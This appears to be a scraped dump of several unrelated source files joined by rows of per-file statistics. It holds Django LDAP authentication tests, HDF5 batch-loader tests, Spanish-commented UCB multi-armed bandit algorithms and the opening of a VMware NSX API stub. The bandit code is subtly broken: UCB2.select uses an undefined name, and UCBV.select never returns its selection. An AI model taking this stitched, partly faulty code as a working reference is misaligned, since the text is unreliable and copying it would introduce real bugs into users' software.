    """By default an empty password fails without ever binding to LDAP."""
    self._init_settings(USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test")
    alice = authenticate(username="alice", password="")
    self.assertIsNone(alice)
    mock.assert_not_called()
@spy_ldap("simple_bind_s")
def test_permit_empty_password(self, mock):
    """PERMIT_EMPTY_PASSWORD attempts the bind; auth still fails here."""
    self._init_settings(
        USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test", PERMIT_EMPTY_PASSWORD=True
    )
    alice = authenticate(username="alice", password="")
    self.assertIsNone(alice)
    mock.assert_called_once()
@spy_ldap("simple_bind_s")
def test_permit_null_password(self, mock):
    """A None password behaves like an empty one under PERMIT_EMPTY_PASSWORD."""
    self._init_settings(
        USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test", PERMIT_EMPTY_PASSWORD=True
    )
    alice = authenticate(username="alice", password=None)
    self.assertIsNone(alice)
    mock.assert_called_once()
def test_pickle(self):
    """A pickled/unpickled LDAP user still resolves group permissions."""
    self._init_settings(
        USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
        GROUP_SEARCH=LDAPSearch("ou=groups,o=test", ldap.SCOPE_SUBTREE),
        GROUP_TYPE=MemberDNGroupType(member_attr="member"),
        FIND_GROUP_PERMS=True,
    )
    self._init_groups()
    backend = get_backend()
    alice0 = authenticate(username="alice", password="password")
    # Round-trip the authenticated user through pickle.
    pickled = pickle.dumps(alice0, pickle.HIGHEST_PROTOCOL)
    alice = pickle.loads(pickled)
    self.assertIsNotNone(alice)
    self.assertEqual(
        backend.get_group_permissions(alice), {"auth.add_user", "auth.change_user"}
    )
    self.assertEqual(
        backend.get_all_permissions(alice), {"auth.add_user", "auth.change_user"}
    )
    self.assertIs(backend.has_perm(alice, "auth.add_user"), True)
    self.assertIs(backend.has_module_perms(alice, "auth"), True)
def test_mapping_pickle(self):
    """Pickle round-trip also preserves permissions under USE_GROUP_MAPPING."""
    self._init_settings(
        USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
        GROUP_SEARCH=LDAPSearch("ou=groups,o=test", ldap.SCOPE_SUBTREE),
        GROUP_TYPE=MemberDNGroupType(member_attr="member"),
        FIND_GROUP_PERMS=True,
        USE_GROUP_MAPPING=True
    )
    self._init_groups_with_mapping()
    backend = get_backend()
    alice0 = authenticate(username="alice", password="password")
    # Round-trip the authenticated user through pickle.
    pickled = pickle.dumps(alice0, pickle.HIGHEST_PROTOCOL)
    alice = pickle.loads(pickled)
    self.assertIsNotNone(alice)
    self.assertEqual(
        backend.get_group_permissions(alice), {"auth.add_group", "auth.delete_user"}
    )
    self.assertEqual(
        backend.get_all_permissions(alice), {"auth.add_group", "auth.delete_user"}
    )
    self.assertIs(backend.has_perm(alice, "auth.delete_user"), True)
    self.assertIs(backend.has_module_perms(alice, "auth"), True)
@mock.patch("ldap.ldapobject.SimpleLDAPObject.search_s")
def test_search_attrlist(self, mock_search):
    """LDAPSearch passes its attrlist (here ["*", "+"]) through to search_s."""
    backend = get_backend()
    connection = backend.ldap.initialize(self.server.ldap_uri, bytes_mode=False)
    search = LDAPSearch(
        "ou=people,o=test", ldap.SCOPE_SUBTREE, "(uid=alice)", ["*", "+"]
    )
    search.execute(connection)
    mock_search.assert_called_once_with(
        "ou=people,o=test", ldap.SCOPE_SUBTREE, "(uid=alice)", ["*", "+"]
    )
def test_override_authenticate_access_ldap_user(self):
    """Subclasses can mutate ldap_user inside authenticate_ldap_user."""
    self._init_settings(USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test")

    class MyBackend(LDAPBackend):
        def authenticate_ldap_user(self, ldap_user, password):
            # Attribute set here must survive through to the returned user.
            ldap_user.foo = "bar"
            return super().authenticate_ldap_user(ldap_user, password)

    backend = MyBackend()
    user = backend.authenticate(None, username="alice", password="password")
    self.assertEqual(user.ldap_user.foo, "bar")
@spy_ldap("search_s")
def test_dn_not_cached(self, mock):
    """Without CACHE_TIMEOUT, the user DN is looked up on every auth."""
    self._init_settings(
        USER_SEARCH=LDAPSearch(
            "ou=people,o=test", ldap.SCOPE_SUBTREE, "(uid=%(user)s)"
        )
    )
    for _ in range(2):
        user = authenticate(username="alice", password="password")
        self.assertIsNotNone(user)
    # Should have executed once per auth.
    self.assertEqual(mock.call_count, 2)
    # DN is not cached.
    self.assertIsNone(cache.get("cool_django_auth_ldap.user_dn.alice"))
@spy_ldap("search_s")
def test_dn_cached(self, mock):
    """With CACHE_TIMEOUT, the user DN lookup happens once and is cached."""
    self._init_settings(
        USER_SEARCH=LDAPSearch(
            "ou=people,o=test", ldap.SCOPE_SUBTREE, "(uid=%(user)s)"
        ),
        CACHE_TIMEOUT=60,
    )
    for _ in range(2):
        user = authenticate(username="alice", password="password")
        self.assertIsNotNone(user)
    # Should have executed only once.
    self.assertEqual(mock.call_count, 1)
    # DN is cached.
    self.assertEqual(
        cache.get("cool_django_auth_ldap.user_dn.alice"), "uid=alice,ou=people,o=test"
    )
def test_deprecated_cache_groups(self):
    """CACHE_GROUPS still works but emits a DeprecationWarning."""
    self._init_settings(
        USER_SEARCH=LDAPSearch(
            "ou=people,o=test", ldap.SCOPE_SUBTREE, "(uid=%(user)s)"
        ),
        CACHE_GROUPS=True,  # deprecated alias for CACHE_TIMEOUT
    )
    with warnings.catch_warnings(record=True) as w:
        warnings.simplefilter("always")
        user = authenticate(username="alice", password="password")
        self.assertIsNotNone(user)
        self.assertEqual(len(w), 1)
        self.assertEqual(w[0].category, DeprecationWarning)
        self.assertEqual(
            str(w[0].message),
            "Found deprecated setting AUTH_LDAP_CACHE_GROUP. Use "
            "AUTH_LDAP_CACHE_TIMEOUT instead.",
        )
    # DN is cached.
    self.assertEqual(
        cache.get("cool_django_auth_ldap.user_dn.alice"), "uid=alice,ou=people,o=test"
    )
#
# Utilities
#
def _init_settings(self, **kwargs):
    """Install AUTH_LDAP_* settings for the duration of the current test.

    Keyword names are prefixed with AUTH_LDAP_; SERVER_URI defaults to the
    test LDAP server's URI when not given explicitly.
    """
    kwargs.setdefault("SERVER_URI", self.server.ldap_uri)
    overrides = {f"AUTH_LDAP_{key}": value for key, value in kwargs.items()}
    cm = override_settings(**overrides)
    cm.enable()
    # Undo the override automatically when the test finishes.
    self.addCleanup(cm.disable)
def _init_groups(self):
    """Create the three active_* groups, each with add/change user permissions."""
    permissions = [
        Permission.objects.get(codename="add_user"),
        Permission.objects.get(codename="change_user"),
    ]
    for group_name in ("active_gon", "active_px", "active_nis"):
        group = Group.objects.create(name=group_name)
        group.permissions.add(*permissions)
def _init_groups_with_mapping(self):
    """Create django_* groups with permissions, plus LDAP-name mappings.

    Each Django group ``django_<name>`` is mapped to the LDAP group ``<name>``.
    """
    permissions = [
        Permission.objects.get(codename="add_group"),
        Permission.objects.get(codename="delete_user"),
    ]
    ldap_names = ("active_gon", "active_px", "active_nis")
    django_groups = {}
    for ldap_name in ldap_names:
        group = Group.objects.create(name="django_" + ldap_name)
        group.permissions.add(*permissions)
        django_groups[ldap_name] = group
    # Create the mappings after all groups exist, as the original did.
    for ldap_name in ldap_names:
        GroupMapping.objects.create(
            django_group=django_groups[ldap_name], ldap_group_name=ldap_name
        )
| 37.00476
| 122
| 0.618866
| 8,743
| 77,747
| 5.263411
| 0.061306
| 0.023252
| 0.023665
| 0.034182
| 0.847212
| 0.815203
| 0.795211
| 0.769025
| 0.757704
| 0.737668
| 0
| 0.00248
| 0.258492
| 77,747
| 2,100
| 123
| 37.022381
| 0.79575
| 0.031873
| 0
| 0.646639
| 0
| 0
| 0.160907
| 0.072637
| 0
| 0
| 0
| 0
| 0.155265
| 1
| 0.07674
| false
| 0.070791
| 0.012493
| 0.00119
| 0.098156
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
22f569ff73204966052ebdd3b28a02a28d34d1f8
| 8,626
|
py
|
Python
|
vl/test/test_data.py
|
hurwitzlab/viral-learning
|
8d7aebc0d58fa32a429f4a47593452ee2722ba82
|
[
"MIT"
] | 1
|
2018-02-23T16:49:30.000Z
|
2018-02-23T16:49:30.000Z
|
vl/test/test_data.py
|
hurwitzlab/viral-learning
|
8d7aebc0d58fa32a429f4a47593452ee2722ba82
|
[
"MIT"
] | null | null | null |
vl/test/test_data.py
|
hurwitzlab/viral-learning
|
8d7aebc0d58fa32a429f4a47593452ee2722ba82
|
[
"MIT"
] | null | null | null |
import h5py
import numpy as np
from vl.data import load_kmer_random_batches_h5, load_kmer_range_batches_h5
def test_load_kmer_range_batches_h5():
    """Exercise load_kmer_range_batches_h5 on a small, known HDF5 fixture.

    Writes a 12x2 "bacteria" dataset and a 10x2 "virus" dataset with
    sequential values, then verifies both the unshuffled batch sequence
    (including wrap-around on the third batch) and the exact row order
    produced with shuffling under np.random.seed(1).
    """
    with h5py.File('unit_test.h5', 'w') as test_data:
        dset1_shape = (12, 2)
        dset1 = test_data.create_dataset('/test/data1', dset1_shape, dtype=np.float64)
        # np.prod replaces np.product, which was deprecated and then removed
        # in NumPy 2.0.
        dset1_array = np.arange(np.prod(dset1_shape)).reshape(dset1_shape)
        dset1[:, :] = dset1_array
        # dset1 holds rows [0, 1], [2, 3], ..., [22, 23].

        dset2_shape = (10, 2)
        dset2 = test_data.create_dataset('/test/data2', dset2_shape, dtype=np.float64)
        dset2_array = np.arange(np.prod(dset2_shape)).reshape(dset2_shape) + np.prod(dset2_shape)
        dset2[:, :] = dset2_array
        # dset2 holds rows [20, 21], [22, 23], ..., [38, 39].

    with h5py.File('unit_test.h5', 'r') as test_data:
        dset1 = test_data['/test/data1']
        dset2 = test_data['/test/data2']

        # Unshuffled batches: first half bacteria (label 0), then virus (label 1).
        gen1 = load_kmer_range_batches_h5(
            name='gen1',
            bacteria_dset=dset1,
            virus_dset=dset2,
            bacteria_range=(0, dset1_shape[0]),
            virus_range=(0, dset2.shape[0]),
            half_batch_size=5,
            shuffle_batch=False)

        batch1, labels1 = next(gen1)
        batch2, labels2 = next(gen1)
        batch3, labels3 = next(gen1)

        half_labels = [[0]] * 5 + [[1]] * 5
        assert np.all(batch1 == np.vstack((dset1_array[:5, :], dset2_array[:5, :])))
        assert np.all(labels1 == half_labels)
        assert np.all(batch2 == np.vstack((dset1_array[5:10, :], dset2_array[5:10, :])))
        assert np.all(labels2 == half_labels)
        # The virus range is exhausted after two batches, so batch 3 wraps around.
        assert np.all(batch3 == np.vstack((dset1_array[:5, :], dset2_array[:5, :])))
        assert np.all(labels3 == half_labels)

        # Shuffled batches: exact row order is pinned by the seeded RNG.
        np.random.seed(1)
        gen2 = load_kmer_range_batches_h5(
            name='gen2',
            bacteria_dset=dset1,
            virus_dset=dset2,
            bacteria_range=(0, dset1_shape[0]),
            virus_range=(0, dset2.shape[0]),
            half_batch_size=5,
            shuffle_batch=True)

        batch1, labels1 = next(gen2)
        batch2, labels2 = next(gen2)
        batch3, labels3 = next(gen2)

        assert batch1.shape == (10, 2)
        assert np.all(batch1 == np.vstack((
            dset1_array[2, :],
            dset2_array[4, :],
            dset2_array[1, :],
            dset1_array[4, :],
            dset1_array[0, :],
            dset1_array[3, :],
            dset1_array[1, :],
            dset2_array[2, :],
            dset2_array[3, :],
            dset2_array[0, :])))
        assert labels1.shape == (10, 1)
        assert np.all(labels1 == [[0], [1], [1], [0], [0], [0], [0], [1], [1], [1]])

        assert batch2.shape == (10, 2)
        assert np.all(batch2 == np.vstack((
            dset2_array[9, :],
            dset2_array[5, :],
            dset1_array[8, :],
            dset1_array[5, :],
            dset2_array[8, :],
            dset1_array[9, :],
            dset1_array[7, :],
            dset1_array[6, :],
            dset2_array[6, :],
            dset2_array[7, :])))
        assert labels2.shape == (10, 1)
        assert np.all(labels2 == [[1], [1], [0], [0], [1], [0], [0], [0], [1], [1]])

        assert batch3.shape == (10, 2)
        assert np.all(batch3 == np.vstack((
            dset2_array[3, :],
            dset1_array[3, :],
            dset2_array[0, :],
            dset2_array[4, :],
            dset1_array[0, :],
            dset2_array[1, :],
            dset1_array[1, :],
            dset2_array[2, :],
            dset1_array[4, :],
            dset1_array[2, :])))
        assert labels3.shape == (10, 1)
        assert np.all(labels3 == [[1], [0], [1], [1], [0], [1], [0], [1], [0], [0]])
def test_load_kmer_random_batches_h5():
    """Exercise load_kmer_random_batches_h5 on a small, known HDF5 fixture.

    Mirrors test_load_kmer_range_batches_h5 but drives the generator with
    explicit subsample index arrays instead of (start, stop) ranges.
    """
    with h5py.File('unit_test.h5', 'w') as test_data:
        dset1_shape = (12, 2)
        dset1 = test_data.create_dataset('/test/data1', dset1_shape, dtype=np.float64)
        # np.prod replaces np.product, which was deprecated and then removed
        # in NumPy 2.0.
        dset1_array = np.arange(np.prod(dset1_shape)).reshape(dset1_shape)
        dset1[:, :] = dset1_array
        # dset1 holds rows [0, 1], [2, 3], ..., [22, 23].

        dset2_shape = (10, 2)
        dset2 = test_data.create_dataset('/test/data2', dset2_shape, dtype=np.float64)
        dset2_array = np.arange(np.prod(dset2_shape)).reshape(dset2_shape) + np.prod(dset2_shape)
        dset2[:, :] = dset2_array
        # dset2 holds rows [20, 21], [22, 23], ..., [38, 39].

    with h5py.File('unit_test.h5', 'r') as test_data:
        dset1 = test_data['/test/data1']
        dset2 = test_data['/test/data2']

        # Unshuffled batches over full-index subsamples.
        gen1 = load_kmer_random_batches_h5(
            name='gen1',
            bacteria_dset=dset1,
            virus_dset=dset2,
            bacteria_subsample=np.arange(dset1.shape[0]),
            virus_subsample=np.arange(dset2.shape[0]),
            half_batch_size=5,
            shuffle_batch=False)

        batch1, labels1 = next(gen1)
        batch2, labels2 = next(gen1)
        batch3, labels3 = next(gen1)

        # (A stray debug print(batch2) was removed here.)
        half_labels = [[0]] * 5 + [[1]] * 5
        assert np.all(batch1 == np.vstack((dset1_array[:5, :], dset2_array[:5, :])))
        assert np.all(labels1 == half_labels)
        assert np.all(batch2 == np.vstack((dset1_array[5:10, :], dset2_array[5:10, :])))
        assert np.all(labels2 == half_labels)
        # The virus subsample is exhausted after two batches; batch 3 wraps around.
        assert np.all(batch3 == np.vstack((dset1_array[:5, :], dset2_array[:5, :])))
        assert np.all(labels3 == half_labels)

        # Shuffled batches: exact row order is pinned by the seeded RNG.
        np.random.seed(1)
        gen2 = load_kmer_random_batches_h5(
            name='gen2',
            bacteria_dset=dset1,
            virus_dset=dset2,
            bacteria_subsample=np.arange(dset1_shape[0]),
            virus_subsample=np.arange(dset2.shape[0]),
            half_batch_size=5,
            shuffle_batch=True)

        batch1, labels1 = next(gen2)
        batch2, labels2 = next(gen2)
        batch3, labels3 = next(gen2)

        assert batch1.shape == (10, 2)
        assert np.all(batch1 == np.vstack((
            dset1_array[2, :],
            dset2_array[4, :],
            dset2_array[1, :],
            dset1_array[4, :],
            dset1_array[0, :],
            dset1_array[3, :],
            dset1_array[1, :],
            dset2_array[2, :],
            dset2_array[3, :],
            dset2_array[0, :])))
        assert labels1.shape == (10, 1)
        assert np.all(labels1 == [[0], [1], [1], [0], [0], [0], [0], [1], [1], [1]])

        assert batch2.shape == (10, 2)
        assert np.all(batch2 == np.vstack((
            dset2_array[9, :],
            dset2_array[5, :],
            dset1_array[8, :],
            dset1_array[5, :],
            dset2_array[8, :],
            dset1_array[9, :],
            dset1_array[7, :],
            dset1_array[6, :],
            dset2_array[6, :],
            dset2_array[7, :])))
        assert labels2.shape == (10, 1)
        assert np.all(labels2 == [[1], [1], [0], [0], [1], [0], [0], [0], [1], [1]])

        assert batch3.shape == (10, 2)
        assert np.all(batch3 == np.vstack((
            dset2_array[3, :],
            dset1_array[3, :],
            dset2_array[0, :],
            dset2_array[4, :],
            dset1_array[0, :],
            dset2_array[1, :],
            dset1_array[1, :],
            dset2_array[2, :],
            dset1_array[4, :],
            dset1_array[2, :])))
        assert labels3.shape == (10, 1)
        assert np.all(labels3 == [[1], [0], [1], [1], [0], [1], [0], [1], [0], [0]])
| 33.564202
| 103
| 0.465221
| 1,040
| 8,626
| 3.636538
| 0.098077
| 0.105764
| 0.069804
| 0.014807
| 0.982549
| 0.963511
| 0.957694
| 0.957694
| 0.957694
| 0.957694
| 0
| 0.118253
| 0.34709
| 8,626
| 256
| 104
| 33.695313
| 0.553267
| 0.076165
| 0
| 0.930233
| 0
| 0
| 0.019697
| 0
| 0
| 0
| 0
| 0
| 0.209302
| 1
| 0.011628
| false
| 0
| 0.017442
| 0
| 0.02907
| 0.005814
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a3a803915854109d3925e5378843f1a0d0f44cad
| 10,111
|
py
|
Python
|
mablane/algortims/_UCB.py
|
analyticslane/mablane
|
237dd5bbeb40ba9a175a65d0327e57e29e0438d0
|
[
"MIT"
] | null | null | null |
mablane/algortims/_UCB.py
|
analyticslane/mablane
|
237dd5bbeb40ba9a175a65d0327e57e29e0438d0
|
[
"MIT"
] | null | null | null |
mablane/algortims/_UCB.py
|
analyticslane/mablane
|
237dd5bbeb40ba9a175a65d0327e57e29e0438d0
|
[
"MIT"
] | null | null | null |
import numpy as np
from ._Epsilon import Epsilon
class UCB1(Epsilon):
    """Multi-armed bandit agent implementing the UCB1 strategy.

    Parameters
    ----------
    bandits : array of Bandit
        The bandits to play against.

    Methods
    -------
    run :
        Play a series of rounds with the bandits chosen by the algorithm.
    update :
        Refresh auxiliary values after a round.
    select :
        Choose the bandit to play in the next round.
    average_reward :
        Mean reward obtained so far.
    plot :
        Plot the history of plays.

    References
    ----------
    Giuseppe Burtini, Jason Loeppky, and Ramon Lawrence. "A survey of online
    experiment design with the stochastic multi-armed bandit." arXiv preprint
    arXiv:1510.00757 (2015).
    """

    def select(self):
        """Return the index of the bandit to play next (UCB1 rule)."""
        total = len(self._rewards)
        # Play each bandit once before applying the UCB1 score.
        if total < self._num_bandits:
            return total
        scores = [
            self._mean[i] + np.sqrt(2 * np.log(total) / self._plays[i])
            for i in range(self._num_bandits)
        ]
        # Break ties among maximal scores uniformly at random.
        best = np.where(scores == np.max(scores))[0]
        return np.random.choice(best)
class UCB2(Epsilon):
    """Multi-armed bandit agent implementing the UCB2 strategy.

    Parameters
    ----------
    bandits : array of Bandit
        The bandits to play against.
    alpha : float
        Hyperparameter influencing the algorithm's learning rate.

    Methods
    -------
    run :
        Play a series of rounds with the bandits chosen by the algorithm.
    update :
        Refresh auxiliary values after a round.
    select :
        Choose the bandit to play in the next round.
    average_reward :
        Mean reward obtained so far.
    plot :
        Plot the history of plays.

    References
    ----------
    Giuseppe Burtini, Jason Loeppky, and Ramon Lawrence. "A survey of online
    experiment design with the stochastic multi-armed bandit." arXiv preprint
    arXiv:1510.00757 (2015).
    """

    def __init__(self, bandits, alpha=0.1):
        self.alpha = alpha
        self._mean = [0] * len(bandits)
        super(UCB2, self).__init__(bandits)

    def select(self):
        """Return the index of the bandit to play next (UCB2 rule)."""
        total = len(self._rewards)
        if total == 0:
            # No history yet: pick uniformly at random.
            bandit = np.random.choice(self._num_bandits)
        else:
            # BUG FIX: the original referenced an undefined local name
            # `num_bandits` here, raising NameError on every call with
            # history; it must be the instance attribute.
            ucb = [0] * self._num_bandits
            for i in range(self._num_bandits):
                try:
                    # Epoch length tau grows geometrically with plays.
                    tau = int(np.ceil((1 + self.alpha) ** self._plays[i]))
                    if np.log(np.e * total / tau) > 0:
                        bonus = np.sqrt((1. + self.alpha) * np.log(np.e * total / tau) / (2 * tau))
                    else:
                        bonus = 0
                except OverflowError:
                    # (1 + alpha) ** plays can overflow to inf, and
                    # int(inf) raises OverflowError; fall back to no bonus.
                    # Narrowed from a bare `except:` that hid real errors.
                    bonus = 0
                if np.isnan(bonus):
                    ucb[i] = self._mean[i]
                else:
                    ucb[i] = self._mean[i] + bonus
            max_bandits = np.where(ucb == np.max(ucb))[0]
            bandit = np.random.choice(max_bandits)
        return bandit
class UCB1Tuned(Epsilon):
    """Multi-armed bandit agent implementing the UCB1-Tuned strategy.

    Parameters
    ----------
    bandits : array of Bandit
        The bandits to play against.

    Methods
    -------
    run :
        Play a series of rounds with the bandits chosen by the algorithm.
    update :
        Refresh auxiliary values after a round.
    select :
        Choose the bandit to play in the next round.
    average_reward :
        Mean reward obtained so far.
    plot :
        Plot the history of plays.

    References
    ----------
    Giuseppe Burtini, Jason Loeppky, and Ramon Lawrence. "A survey of online
    experiment design with the stochastic multi-armed bandit." arXiv preprint
    arXiv:1510.00757 (2015).
    """

    def __init__(self, bandits):
        self._mean2 = [0] * len(bandits)
        super(UCB1Tuned, self).__init__(bandits)

    def update(self, bandit, reward):
        """Incrementally update the running mean of squared rewards."""
        plays = self._plays[bandit]
        previous = self._mean2[bandit]
        self._mean2[bandit] = (1 - 1.0 / plays) * previous \
            + 1.0 / plays * reward ** 2

    def select(self):
        """Return the index of the bandit to play next (UCB1-Tuned rule)."""
        total = len(self._rewards)
        if total == 0:
            # No history yet: pick uniformly at random.
            return np.random.choice(self._num_bandits)
        ucb = []
        for i in range(self._num_bandits):
            # Variance proxy V(i); the unplayed-arm branch omits the
            # division by plays to avoid dividing by zero.
            if self._plays[i] == 0:
                v = self._mean2[i] - self._mean[i] ** 2 + np.sqrt(2 * np.log(total))
            else:
                v = self._mean2[i] - self._mean[i] ** 2 + np.sqrt(2 * np.log(total) / self._plays[i])
            ucb.append(self._mean[i] + np.sqrt(np.log(total) * np.min([1/4, v])))
        # Break ties among maximal scores uniformly at random.
        best = np.where(ucb == np.max(ucb))[0]
        return np.random.choice(best)
class UCBNormal(Epsilon):
    """Multi-armed bandit agent implementing the UCB-Normal strategy.

    Parameters
    ----------
    bandits : array of Bandit
        The bandits to play against.

    Methods
    -------
    run :
        Play a series of rounds with the bandits chosen by the algorithm.
    update :
        Refresh auxiliary values after a round.
    select :
        Choose the bandit to play in the next round.
    average_reward :
        Mean reward obtained so far.
    plot :
        Plot the history of plays.

    References
    ----------
    Giuseppe Burtini, Jason Loeppky, and Ramon Lawrence. "A survey of online
    experiment design with the stochastic multi-armed bandit." arXiv preprint
    arXiv:1510.00757 (2015).
    """

    def __init__(self, bandits):
        self._rewards2 = [0] * len(bandits)
        super(UCBNormal, self).__init__(bandits)

    def update(self, bandit, reward):
        """Accumulate the sum of squared rewards for the played bandit."""
        self._rewards2[bandit] += reward ** 2

    def select(self):
        """Return the index of the bandit to play next (UCB-Normal rule)."""
        total = len(self._rewards)
        # Minimum number of plays required of every bandit.
        min_plays = np.ceil(8 * np.log(total)) if total > 0 else 1
        under_played = np.where(np.array(self._plays) < min_plays)[0]
        if under_played.size > 0:
            # Some bandit has not met its minimum: pick among those.
            return np.random.choice(under_played)
        ucb = [0] * self._num_bandits
        for i in range(self._num_bandits):
            if self._plays[i] > 1:
                bonus = 16 * (self._rewards2[i] - self._plays[i] * self._mean[i]**2) / (self._plays[i] - 1)
                bonus *= np.log(total - 1) / self._plays[i]
                ucb[i] = self._mean[i] + np.sqrt(bonus)
            else:
                ucb[i] = self._mean[i]
        # Break ties among maximal scores uniformly at random.
        best = np.where(ucb == np.max(ucb))[0]
        return np.random.choice(best)
class UCBV(Epsilon):
"""
Agente que soluciona el problema del el Bandido Multibrazo
(Multi-Armed Bandit) mediante el uso de una estrategia UCBV
Parámetros
----------
bandits : array of Bandit
Vector con los bandidos con los que se debe jugar
b : float
Hiperparámetro para seleccionar el ration de aprendizaje
Métodos
-------
run :
Realiza una serie de tiradas con los bandidos seleccionados
por el algoritmo
update:
Actualiza los valores adicionales después de una tirada
select :
Selecciona un bandido para jugar en la próxima tirada
average_reward :
Obtención de la recompensa promedio
plot :
Representación gráfica del histórico de tiradas
References
----------
Jean Yves Audibert, Rémi Munos, and Csaba Szepesvári.
"Exploration-exploitation trade-off using variance estimates in multi-armed
bandits." Theoretical Computer Science, Volume 410, Issue 19, 28 April 2009,
Pages 1876-1902 (https://doi.org/10.1016/j.tcs.2009.01.016)
"""
def __init__(self, bandits, b=3):
self.b = b
self._mean2 = [0] * len(bandits)
super(UCBV, self).__init__(bandits)
def update(self, bandit, reward):
self._mean2[bandit] += reward**2
def select(self):
num_bandits = len(self.bandits)
total = len(self._rewards)
if total < num_bandits:
bandit = total
else:
ucb = [0] * num_bandits
for i in range(num_bandits):
var = self._mean2[i] / self._plays[i] - self._mean[i]**2
ucb[i] = self._mean[i]
ucb[i] += np.sqrt(2 * var * np.log(total) / self._plays[i])
ucb[i] += self.b * np.log(total) / self._plays[i]
max_bandits = np.where(ucb == np.max(ucb))[0]
bandit = np.random.choice(max_bandits)
| 31.303406
| 111
| 0.557709
| 1,203
| 10,111
| 4.586866
| 0.162095
| 0.01631
| 0.017941
| 0.019935
| 0.810982
| 0.795759
| 0.749184
| 0.737224
| 0.722363
| 0.690286
| 0
| 0.024071
| 0.350806
| 10,111
| 323
| 112
| 31.303406
| 0.816575
| 0.427356
| 0
| 0.571429
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.01548
| 0
| 1
| 0.107143
| false
| 0
| 0.017857
| 0
| 0.205357
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4319ba4e0989f9f1415b9a5e9155385b3d646341
| 209,148
|
py
|
Python
|
com/vmware/nsx/fabric_client.py
|
adammillerio/vsphere-automation-sdk-python
|
c07e1be98615201139b26c28db3aa584c4254b66
|
[
"MIT"
] | null | null | null |
com/vmware/nsx/fabric_client.py
|
adammillerio/vsphere-automation-sdk-python
|
c07e1be98615201139b26c28db3aa584c4254b66
|
[
"MIT"
] | null | null | null |
com/vmware/nsx/fabric_client.py
|
adammillerio/vsphere-automation-sdk-python
|
c07e1be98615201139b26c28db3aa584c4254b66
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
#---------------------------------------------------------------------------
# Copyright 2020 VMware, Inc. All rights reserved.
# AUTO GENERATED FILE -- DO NOT MODIFY!
#
# vAPI stub file for package com.vmware.nsx.fabric.
#---------------------------------------------------------------------------
"""
"""
__author__ = 'VMware, Inc.'
__docformat__ = 'restructuredtext en'
import sys
from vmware.vapi.bindings import type
from vmware.vapi.bindings.converter import TypeConverter
from vmware.vapi.bindings.enum import Enum
from vmware.vapi.bindings.error import VapiError
from vmware.vapi.bindings.struct import VapiStruct
from vmware.vapi.bindings.stub import (
ApiInterfaceStub, StubFactoryBase, VapiInterface)
from vmware.vapi.bindings.common import raise_core_exception
from vmware.vapi.data.validator import (UnionValidator, HasFieldsOfValidator)
from vmware.vapi.exception import CoreException
from vmware.vapi.lib.constants import TaskType
from vmware.vapi.lib.rest import OperationRestMetadata
class ComputeCollectionFabricTemplates(VapiInterface):
    """
    vAPI stub for the
    com.vmware.nsx.fabric.compute_collection_fabric_templates service
    (see ``_VAPI_SERVICE_ID`` below).
    """
    # NOTE(review): this file is auto-generated (see the header above:
    # "AUTO GENERATED FILE -- DO NOT MODIFY!"). Fix defects by regenerating
    # from the service definition, not by hand-editing here.
    _VAPI_SERVICE_ID = 'com.vmware.nsx.fabric.compute_collection_fabric_templates'
    """
    Identifier of the service in canonical form.
    """
    def __init__(self, config):
        """
        :type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
        :param config: Configuration to be used for creating the stub.
        """
        VapiInterface.__init__(self, config, _ComputeCollectionFabricTemplatesStub)
        self._VAPI_OPERATION_IDS = {}

    def create(self,
               compute_collection_fabric_template,
               ):
        """
        Fabric templates are fabric configurations applied at the compute
        collection level. This configurations is used to decide what automated
        operations should be a run when a host membership changes.

        :type compute_collection_fabric_template: :class:`com.vmware.nsx.model_client.ComputeCollectionFabricTemplate`
        :param compute_collection_fabric_template: (required)
        :rtype: :class:`com.vmware.nsx.model_client.ComputeCollectionFabricTemplate`
        :return: com.vmware.nsx.model.ComputeCollectionFabricTemplate
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        return self._invoke('create',
                            {
                            'compute_collection_fabric_template': compute_collection_fabric_template,
                            })

    def delete(self,
               fabric_template_id,
               ):
        """
        Deletes compute collection fabric template for the given id

        :type fabric_template_id: :class:`str`
        :param fabric_template_id: (required)
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        return self._invoke('delete',
                            {
                            'fabric_template_id': fabric_template_id,
                            })

    def get(self,
            fabric_template_id,
            ):
        """
        Get compute collection fabric template for the given id

        :type fabric_template_id: :class:`str`
        :param fabric_template_id: (required)
